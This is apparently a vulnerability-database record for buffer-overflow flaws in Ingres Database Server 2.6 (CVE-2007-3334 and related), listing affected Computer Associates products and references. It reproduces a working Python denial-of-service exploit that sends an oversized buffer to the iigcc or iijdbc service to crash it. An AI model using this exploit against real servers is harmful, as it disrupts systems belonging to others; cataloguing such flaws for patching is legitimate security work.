ID

VAR-E-200706-0107


CVE

cve_id:CVE-2007-3334

Trust: 2.4

cve_id:CVE-2007-3338

Trust: 0.8

cve_id:CVE-2007-3337

Trust: 0.8

cve_id:CVE-2007-3336

Trust: 0.8

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

EDB ID

30224


TITLE

Ingress Database Server 2.6 - Multiple Remote Vulnerabilities - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 30224

DESCRIPTION

Ingress Database Server 2.6 - Multiple Remote Vulnerabilities. CVE-2007-3334CVE-37487 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 30224

AFFECTED PRODUCTS

vendor:ingressmodel:database serverscope:eqversion:2.6

Trust: 1.6

vendor:computermodel:associates advantage ingresscope:eqversion:2.6

Trust: 0.5

vendor:ingresmodel:databasescope:eqversion:20060

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:3.0.3

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.6

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.5

Trust: 0.3

vendor:computermodel:associates wily soa managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates unicenter workload control center 1.0.sp4scope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter workload control center sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.4.2

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter tng 2.4.2jscope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter software deliveryscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp1scope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp3scope:eqversion:5.5

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.2

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.0.2

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service catalogscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter patch managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.1

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter management portalscope:eqversion:3.1.1

Trust: 0.3

vendor:computermodel:associates unicenter lightweight portalscope:eqversion:2

Trust: 0.3

vendor:computermodel:associates unicenter job management optionscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp3scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter desktop management suitescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter desktop and server managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter database command centerscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.11

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.2.1

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.3

Trust: 0.3

vendor:computermodel:associates unicenter asset managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter asset intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter advanced systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates etrust web access controlscope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates etrust secure content managerscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust network forensicsscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust identity managerscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust iam suitescope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust directoryscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust audit r8scope: - version: -

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust admin sp2scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust admin sp1scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates docserverscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates cleverpath predictive analysis serverscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates cleverpath aion brescope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates cleverpath aion bpmscope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates ccsscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates brightstor storage resource managerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor storage command centerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for tru64scope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for solarisscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for hpscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for aixscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:9.0

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates arcserve backup for laptops and desktopsscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbench sp1scope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates advantage data transformerscope:eqversion:2.2

Trust: 0.3

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

EXPLOIT

source: https://www.securityfocus.com/bid/24585/info

Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"

Trust: 1.0

sources: EXPLOIT-DB: 30224

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 30224

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 30224

TYPE

Multiple Remote Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 30224 // EDBNET: 51927

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:vulnerability

Trust: 0.5

sources: PACKETSTORM: 92818

CREDITS

anonymous

Trust: 0.6

sources: EXPLOIT-DB: 30224

EXTERNAL IDS

db:NVDid:CVE-2007-3334

Trust: 2.4

db:EXPLOIT-DBid:30224

Trust: 1.9

db:BIDid:24585

Trust: 1.9

db:NVDid:CVE-2007-3338

Trust: 0.8

db:NVDid:CVE-2007-3337

Trust: 0.8

db:NVDid:CVE-2007-3336

Trust: 0.8

db:EDBNETid:51927

Trust: 0.6

db:PACKETSTORMid:92818

Trust: 0.5

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2007-3334

Trust: 2.1

url:https://www.securityfocus.com/bid/24585/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/30224/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2007-3336

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2007-3338

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2007-3337

Trust: 0.5

url:http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/

Trust: 0.3

url:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Trust: 0.3

url:http://www.ingres.com/

Trust: 0.3

url:https://www.exploit-db.com/exploits/30224

Trust: 0.3

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546

Trust: 0.3

url:http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778

Trust: 0.3

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

SOURCES

db:BIDid:24585
db:PACKETSTORMid:92818
db:EXPLOIT-DBid:30224
db:EDBNETid:51927

LAST UPDATE DATE

2022-07-27T09:48:33.447000+00:00


SOURCES UPDATE DATE

db:BIDid:24585date:2015-03-19T08:36:00

SOURCES RELEASE DATE

db:BIDid:24585date:2007-06-21T00:00:00
db:PACKETSTORMid:92818date:2010-08-17T01:35:50
db:EXPLOIT-DBid:30224date:2007-06-21T00:00:00
db:EDBNETid:51927date:2007-06-21T00:00:00